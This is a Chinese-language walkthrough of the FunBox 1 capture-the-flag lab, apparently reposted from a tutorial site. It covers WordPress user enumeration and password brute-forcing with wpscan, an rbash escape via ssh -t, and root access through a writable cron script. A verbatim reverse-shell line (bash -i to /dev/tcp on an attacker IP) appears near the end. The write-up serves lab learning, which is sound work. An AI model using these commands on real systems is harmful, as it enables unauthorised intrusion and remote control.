FUNBOX_1靶场复盘
这个系列的靶场给出的干扰因素都挺多的,必须从中找到有用的线索才可以。
这个靶场你扫描到ip地址后打开网页会发现,ip自动转换成域名了,所以我们需要添加一条hosts解析才可以。
192.168.102.190 funbox.fritz.box
从目录扫描中可以看出这是一个wordpress的网站。
利用wpscan工具可以枚举wordpress的用户名。
wpscan --url http://funbox.fritz.box --enumerate u
然后对用户名进行爆破一下,发现两个的密码都出来了。
wpscan --url http://funbox.fritz.box -U users -P /usr/share/wordlists/rockyou.txt
这里是利用joe用户进行了ssh登陆,当然也可以登陆wordpress后台,但是没什么可用的东西。
登陆后发现这是一个rbash,就是这是一个只读bash。
利用ssh的-t
参数我们可以跳过这个限制。
ssh上来后,ls一下发现有个mbox文件,发现类似两个邮件,并且是隔了几分钟的,所以就怀疑后台在运行着一个计时任务。
就wget下来一个pspy64,这个文件可以实时监控进程。
发现的确有一个计时任务,有两个用户都在运行,一个是UID为1000的,一个是root用户,只要我们能往这里面写的内容就可以拿到一个root的反弹shell。
发现这个文件我们是可修改的,在里面添加了一条反弹shell文件,就等拿到UID为1000的权限或者,root权限,如过没拿到ROOT权限就重新监听一下。
过了一会儿就拿到root权限了,这里应该是普通用户执行两次后root用户才会执行一次,所以要监控好root用户什么时候执行。文章来源:https://www.toymoban.com/news/detail-607384.html
bash -i >/dev/tcp/192.168.102.129/8888 0>&1
文章来源地址https://www.toymoban.com/news/detail-607384.html
到了这里,关于FUNBOX_1靶场详解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!